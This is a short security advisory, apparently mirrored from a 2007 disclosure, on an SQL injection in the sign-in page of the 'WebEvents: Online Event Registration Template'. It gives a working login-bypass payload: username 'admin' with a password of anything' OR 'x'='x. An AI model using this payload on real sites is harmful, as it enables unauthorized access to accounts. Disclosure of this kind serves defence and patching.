Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17640
HistoryJul 28, 2007 - 12:00 a.m.

WebEvents: Online Event Registration Template Username Fields SQL INJECTION

2007-07-2800:00:00
vulners.com
15

A R I A - S E C U R I T Y


WebEvents: Online Event Registration Template Username Field SQL Injection
Vendor: http://www.codewidgets.com

http://target.com/PATH/sign_in.aspx

Username: admin
Password: anything' OR 'x'='x

Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info